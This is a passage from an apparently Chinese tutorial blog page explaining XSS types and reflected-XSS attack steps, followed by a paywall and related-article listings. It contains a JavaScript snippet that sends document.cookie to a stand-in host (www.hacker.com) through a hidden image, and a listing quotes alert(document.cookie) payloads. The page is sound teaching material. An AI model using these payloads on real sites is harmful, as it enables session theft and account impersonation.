XSS攻击修改服务器的代码,Web安全系列之XSS攻击

最新推荐文章于 2024-04-14 22:38:53 发布
最新推荐文章于 2024-04-14 22:38:53 发布
阅读量1.6k 收藏 2
点赞数 3
文章标签: XSS攻击修改服务器的代码

什么是XSS攻击

XSS(Cross Site Scripting)中文名称是:跨站脚本攻击。XSS重点不在跨站,而在于执行的脚本。

XSS的原理是指攻击者利用网站的安全漏洞,向web页面中插入一段恶意的script代码,当用户浏览网页时,执行脚本,攻击者就可以非法获取用户的敏感信息(如cookie、账号密码等),从而达到攻击的目的。

XSS的类型

从攻击代码的工作方式可以分为三个类型:

1、反射型XSS。反射型跨站脚本漏洞,最普遍的类型。用户访问服务器-跨站链接-返回跨站代码。

2、存储型XSS。最直接的危害类型,跨站代码存储在服务器(数据库)。

3、DOM-based XSS。客户端脚本处理逻辑导致的安全问题。

存储型XSS将攻击代码存储在服务器上,属于持久型攻击。

反射型XSS也被称为非持久型攻击。

DOM-based XSS,页面本身不变,只是对DOM环境的恶意修改。

反射型XSS

反射性XSS的原理是:攻击者一般会通过特定手法(如电子邮件),诱使用户去访问一个包含恶意代码的 URL,当受害者点击这些专门设计的链接的时候,恶意代码会直接在受害者主机上的浏览器执行。

反射性XSS又可以叫做非持久性XSS。为什么叫反射型XSS呢?那是因为这种攻击方式的注入代码是从目标服务器通过错误信息,搜索结果等方式反射回来的,而为什么又叫非持久性XSS呢?那是因为这种攻击方式只有一次性。

反射型XSS通常出现在恶意URL链接、网站的搜索栏、用户登录口等地方,常用来窃取客户端 Cookies 或进行钓鱼欺骗。

反射型XSS的攻击步骤是:

1、攻击者在正常的url后面加上恶意攻击代码,然后诱导用户点击

2、当用户打开带有恶意代码的URL的时候,网站服务端将恶意代码从URL中取出,拼接在html中并且返回给浏览器端。

3、用户浏览器接收到响应后执行解析,其中的恶意代码也会被执行到。

4、攻击者通过恶意代码来窃取到用户数据并发送到攻击者的网站。攻击者会获取到比如cookie等信息,然后使用该信息来冒充合法用户的行为,调用目标网站接口执行攻击等操作。

e8195368c542

1.png

示例:用户打开了一个攻击者拼接的恶意链接,攻击者获取到用户的cookie

简单粗暴型(直接把用户cookie加在url地址上)

http://www.A.com?name=

更加隐蔽型(增加一层伪装)

http://www.A.com?name=

// joke.js

var img = document.createElement('img');

img.width = 0;

img.height = 0;

img.src='http://www.hacker.com?getCookie.php?joke=encodeURIComponent(document.cookie)'

存储型XSS

存储型XSS的原理是:攻击者将XSS代码提交并存储到服务器端(数据库,内存,文件系统等),下次请求目标页面时不用再提交XSS代码。当目标用户访问该页面获取数据时,

最低0.47元/天 解锁文章
百通社
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web安全XSS攻击与防御小结
02-23
恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。攻击者对含有漏洞的服务器发起XSS攻击(注入JS代码)。诱使受害者打开受到攻击...
XSS 攻击常用代码
高压锅博客
12-22 7169
代码】XSS 攻击常用代码
xss payload
07-15 379
'><script>alert(document.cookie)</script>='><script>alert(document.cookie)</script><script>alert(document.cookie)</script><script>alert(vulnerab...
xss攻击原理与解决方法
最新发布
套路猿的博客
04-14 7万+
概述XSS攻击Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨大的,是web安全的头号大敌。攻击的条件实施
XSS跨站脚本攻击(基础详解)
cike_y
01-10 2901
一次xss的备忘本,xss攻击有很多操作我都还没学会带入真正的实战,等实战成功我会再总结一篇
XSS漏洞利用手段/篡改链接实战/beef生成恶意网页
ChenD的学习笔记
10-10 1172
XSS篡改网页链接,beef生成恶意脚本,搭建恶意网页,劫持目标主机
详解Xss 及SpringBoot 防范Xss攻击(附全部代码
xxxzzzqqq_的博客
03-23 5355
百度百科:​ XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括JavaVBScriptActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。目前,XSS是黑客最常用来攻击互联网的技术之一。
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss跨站脚本攻击的知识点总结: 1.xss跨站脚本攻击的定义 ...
Web安全测试之XSS实例讲解
09-01
Web安全测试中的XSS(Cross Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在受害者的浏览器中注入并执行恶意脚本。攻击者通常利用这种漏洞来窃取用户的敏感信息,如Cookie,甚至操纵用户的浏览器行为,将...
Java防止xss攻击附相关文件下载
08-25
首先说一下思路,防止这种类似于注入攻击,就是使用拦截器(Filter)处理特殊字符或过滤特殊字符 今天介绍一个方法,利用覆盖Servlet的getParameter方法达到处理特殊字符的目的来解决(防止)Xss攻击 web.xml,需要的...
二、XSS(跨站脚本)攻击
weixin_59584646的博客
08-19 969
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。 XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。 XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。 形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。
XSS 攻击
wuli1024的博客
01-03 1578
Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。
Java代码审计之XSS攻击
tpaer的博客
12-07 1557
代码实例复现Java中的XSS攻击,并给出修复建议。
xss攻击
weixin_43155143的博客
05-17 628
一、简述 跨站脚本(Cross-site scripting,简称为:CSS, 但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,跨站脚本攻击缩写为XSS)是一种网站应用程序的安全漏洞攻击。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、 LiveScript、ActiveX、 Flash
危险系数排名前5的注入攻击
xnxqwzy的博客
12-26 854
注入攻击针对注入漏洞——这是一种非常广泛的网络安全漏洞,其中包括一些严重的应用程序安全风险。在OWASP的2021年十大风险中,注入是web应用安全的第三大风险。尽管攻击载体种类繁多,但几乎所有注入攻击的共同点都是,攻击者能够将未经验证的用户输入直接插入到执行的应用程序代码中。根据漏洞的类型和攻击目标的不同,攻击者可能会注入数据库查询、JavaScript代码、本机应用程序代码、操作系统命令等等。
漏洞篇(XSS 跨站脚本攻击一)
m0_58001548的博客
04-08 1868
1、Cookie 概述:Cookie 是一些数据, 存储于你电脑上的文本文件中。当 web 服务器向浏览器发送 web 页面时,在连接关闭后,服务端不会记录用户的信息。Cookie 的作用就是用于解决 "如何记录客户端的用户信息":(1)、当用户访问 web 页面时,他的名字可以记录在 cookie 中。2)、在用户下一次访问该页面时,可以在 cookie 中读取用户访问记录。Cookie 以键值对形式存储,如下所示:
网络安全——XSS跨站脚本攻击
weixin_54055099的博客
09-16 4201
XSS跨站脚本攻击,DVWA靶机的三种类型三个等级的操作
跨站攻击XSS原理及代码示例
2301_77778490的博客
09-15 782
这种攻击可能会让用户根本不知道他们的信息已经被盗或者他们的电脑已经被监控,从而让攻击者可以实时地监控用户的网络活动或者窃取用户的个人信息。例如,我们可以通过注入更复杂的JavaScript代码来完全控制用户的浏览器,从而执行任意操作,如记录用户的键盘输入、监控他们的网络活动、窃取他们的个人信息等等。XSS攻击的危害非常大,它可以让攻击者完全控制用户的浏览器,窃取用户的隐私,破坏用户的账户,甚至在其他网站上执行恶意操作。请注意,以上只是XSS攻击的基础示例,实际中的XSS攻击可能更加复杂和难以防范。
白帽子讲Web安全 第三章 跨站脚本攻击(XSS)
weixin_30419799的博客
10-25 257
XSS----Cross Site Script; XSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。 1、XSS根据效果划分三类: 1)反射型XSS(非持久型XSS):简单的把用户输入的数据“反射”给浏览器。黑客往往需要诱导用户点击一个恶意链接,才能攻击成功。 2)存储型XSS(持久型XSS):存储型会把用户输入...
跨站攻击(XSS+CSRF).docx
01-05
"本次实验主要关注的是Web安全中的两种重要攻击方式:跨站脚本攻击(XSS)和跨站请求伪造(CSRF)。实验旨在让参与者深入理解这两种攻击的原理,掌握不同级别的攻击实施,并了解相应的防御和修复措施。实验环境为...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值